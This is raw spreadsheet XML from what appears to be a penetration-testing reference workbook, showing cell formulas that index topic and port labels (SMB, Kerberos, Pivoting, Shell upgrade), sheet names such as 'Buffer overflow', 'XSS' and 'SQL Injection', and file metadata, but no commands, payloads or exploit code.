        <v>21895</v>
      </c>
      <c r="C12" s="30"/>
      <c r="E12" t="str">
        <f t="array" aca="1" ref="E12" ca="1">INDIRECT("B5")</f>
        <v>Active Directory</v>
      </c>
    </row>
    <row r="13" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A13" s="27" t="s">
        <v>22653</v>
      </c>
      <c r="B13" s="27" t="s">
        <v>1332</v>
      </c>
      <c r="C13" s="30"/>
      <c r="E13" t="str">
        <f t="array" aca="1" ref="E13" ca="1">INDIRECT("A6")</f>
        <v>79 - Finger</v>
      </c>
    </row>
    <row r="14" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A14" s="27" t="s">
        <v>22654</v>
      </c>
      <c r="B14" s="27" t="s">
        <v>22655</v>
      </c>
      <c r="C14" s="30"/>
      <c r="E14" t="str">
        <f t="array" aca="1" ref="E14" ca="1">INDIRECT("B6")</f>
        <v>Bash tools</v>
      </c>
    </row>
    <row r="15" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A15" s="27" t="s">
        <v>22656</v>
      </c>
      <c r="B15" s="27" t="s">
        <v>22657</v>
      </c>
      <c r="C15" s="30"/>
      <c r="E15" t="str">
        <f t="array" aca="1" ref="E15" ca="1">INDIRECT("A7")</f>
        <v>80 / 443 - HTTP</v>
      </c>
    </row>
    <row r="16" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A16" s="27" t="s">
        <v>22658</v>
      </c>
      <c r="B16" s="27" t="s">
        <v>22659</v>
      </c>
      <c r="C16" s="30"/>
      <c r="E16" t="str">
        <f t="array" aca="1" ref="E16" ca="1">INDIRECT("B7")</f>
        <v>Basic use</v>
      </c>
    </row>
    <row r="17" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A17" s="27" t="s">
        <v>22660</v>
      </c>
      <c r="B17" s="27"/>
      <c r="C17" s="30"/>
      <c r="E17" t="str">
        <f t="array" aca="1" ref="E17" ca="1">INDIRECT("A8")</f>
        <v>88 / 464 - Kerberos</v>
      </c>
    </row>
    <row r="18" spans="1:5" x14ac:dyDescent="0.25">
      <c r="B18" s="27"/>
      <c r="C18" s="30"/>
      <c r="E18" t="str">
        <f t="array" aca="1" ref="E18" ca="1">INDIRECT("B8")</f>
        <v>File transfer</v>
      </c>
    </row>
    <row r="19" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A19" s="27"/>
      <c r="B19" s="27"/>
      <c r="C19" s="30"/>
      <c r="E19" t="str">
        <f t="array" aca="1" ref="E19" ca="1">INDIRECT("A9")</f>
        <v>110 / 143 / 993 / 995 - pop3(s)/imap(s)</v>
      </c>
    </row>
    <row r="20" spans="1:5" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A20" s="28"/>
      <c r="B20" s="28"/>
      <c r="C20" s="30"/>
      <c r="E20" t="str">
        <f t="array" aca="1" ref="E20" ca="1">INDIRECT("B9")</f>
        <v>Hash cracking</v>
      </c>
    </row>
    <row r="21" spans="1:5" ht="15.75" thickTop="1" x14ac:dyDescent="0.25">
      <c r="A21" s="29"/>
      <c r="B21" s="29"/>
      <c r="C21" s="27"/>
      <c r="E21" t="str">
        <f t="array" aca="1" ref="E21" ca="1">INDIRECT("A10")</f>
        <v>111 - RPC</v>
      </c>
    </row>
    <row r="22" spans="1:5" x14ac:dyDescent="0.25">
      <c r="E22" t="str">
        <f t="array" aca="1" ref="E22" ca="1">INDIRECT("B10")</f>
        <v>Local enumeration / privesc</v>
      </c>
    </row>
    <row r="23" spans="1:5" x14ac:dyDescent="0.25">
      <c r="E23" t="str">
        <f t="array" aca="1" ref="E23" ca="1">INDIRECT("A11")</f>
        <v>123 - NTP</v>
      </c>
    </row>
    <row r="24" spans="1:5" x14ac:dyDescent="0.25">
      <c r="E24" t="str">
        <f t="array" aca="1" ref="E24" ca="1">INDIRECT("B11")</f>
        <v>Notes and lists</v>
      </c>
    </row>
    <row r="25" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A25" t="s">
        <v>22661</v>
      </c>
      <c r="E25" t="str">
        <f t="array" aca="1" ref="E25" ca="1">INDIRECT("A12")</f>
        <v>135 / 136 - MSRPC</v>
      </c>
    </row>
    <row r="26" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A26" t="s">
        <v>22662</v>
      </c>
      <c r="E26" t="str">
        <f t="array" aca="1" ref="E26" ca="1">INDIRECT("B12")</f>
        <v>Payload</v>
      </c>
    </row>
    <row r="27" spans="1:5" x14ac:dyDescent="0.25">
      <c r="E27" t="str">
        <f t="array" aca="1" ref="E27" ca="1">INDIRECT("A13")</f>
        <v>139 / 445 - SMB</v>
      </c>
    </row>
    <row r="28" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A28" t="s">
        <v>22663</v>
      </c>
      <c r="E28" t="str">
        <f t="array" aca="1" ref="E28" ca="1">INDIRECT("B13")</f>
        <v>Pivoting</v>
      </c>
    </row>
    <row r="29" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A29" t="s">
        <v>22664</v>
      </c>
      <c r="E29" t="str">
        <f t="array" aca="1" ref="E29" ca="1">INDIRECT("A14")</f>
        <v>161 / 162 - SNMP</v>
      </c>
    </row>
    <row r="30" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A30" t="s">
        <v>22665</v>
      </c>
      <c r="E30" t="str">
        <f t="array" aca="1" ref="E30" ca="1">INDIRECT("B14")</f>
        <v>Recon</v>
      </c>
    </row>
    <row r="31" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A31" t="s">
        <v>22666</v>
      </c>
      <c r="E31" t="str">
        <f t="array" aca="1" ref="E31" ca="1">INDIRECT("A15")</f>
        <v>389 / 636 - LDAP</v>
      </c>
    </row>
    <row r="32" spans="1:5" x14ac:dyDescent="0.25">
      <c r="E32" t="str">
        <f t="array" aca="1" ref="E32" ca="1">INDIRECT("B15")</f>
        <v>Shell upgrade</v>
      </c>
    </row>
    <row r="33" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A33" t="s">
        <v>22667</v>
      </c>
      <c r="E33" t="str">
        <f t="array" aca="1" ref="E33" ca="1">INDIRECT("A16")</f>
        <v>1433 - MSSQL</v>
      </c>
    </row>
    <row r="34" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A34" t="s">
        <v>22668</v>
      </c>
      <c r="E34" t="str">
        <f t="array" aca="1" ref="E34" ca="1">INDIRECT("B16")</f>
        <v>Webapp</v>
      </c>
    </row>
    <row r="35" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A35" t="s">
        <v>22669</v>
      </c>
      <c r="E35" t="str">
        <f t="array" aca="1" ref="E35" ca="1">INDIRECT("A17")</f>
        <v>2049 - NFS</v>
      </c>
    </row>
    <row r="36" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A36" t="s">
        <v>22670</v>
      </c>
      <c r="E36">
        <f t="array" aca="1" ref="E36" ca="1">INDIRECT("B17")</f>
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:5" x14ac:dyDescent="0.25">
      <c r="E37">
        <f t="array" aca="1" ref="E37" ca="1">INDIRECT("A18")</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A38" t="s">
        <v>22671</v>
      </c>
      <c r="E38">
        <f t="array" aca="1" ref="E38" ca="1">INDIRECT("B18")</f>
        <v>0</v>
      </c>
    </row>
    <row r="39" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A39" t="s">
        <v>22672</v>
      </c>
      <c r="E39">
        <f t="array" aca="1" ref="E39" ca="1">INDIRECT("A19")</f>
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:5" x14ac:dyDescent="0.25">
      <c r="E40">
        <f t="array" aca="1" ref="E40" ca="1">INDIRECT("B19")</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A41" t="s">
        <v>22673</v>
      </c>
      <c r="E41">
        <f t="array" aca="1" ref="E41" ca="1">INDIRECT("A20")</f>
        <v>0</v>
      </c>
    </row>
    <row r="42" spans="1:5" x14ac:dyDescent="0.25">
      <c r="E42">
        <f t="array" aca="1" ref="E42" ca="1">INDIRECT("B20")</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A3"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="H9" sqref="H9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1" t="s">
        <v>22674</v>
      </c>
    </row>
    <row r="2" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A2" t="s">
        <v>22675</v>
      </c>
    </row>
    <row r="3" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A3" t="s">
        <v>22676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Commands</vt:lpstr>
      <vt:lpstr>Buffer Overflow 2</vt:lpstr>
      <vt:lpstr>Buffer overflow</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Post Exploitation Process</vt:lpstr>
      <vt:lpstr>Port List</vt:lpstr>
      <vt:lpstr>Windows Privesc</vt:lpstr>
      <vt:lpstr>Linux Privesc</vt:lpstr>
      <vt:lpstr>Webapp</vt:lpstr>
      <vt:lpstr>Venom builder</vt:lpstr>
      <vt:lpstr>Environment preparation</vt:lpstr>
      <vt:lpstr>Reorder 'Category' slider</vt:lpstr>
      <vt:lpstr>NotionNotes URLS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Smalley</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Dylan Gould</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-20T09:48:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-08T05:04:59Z</dcterms:modified>
  <cp:category/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>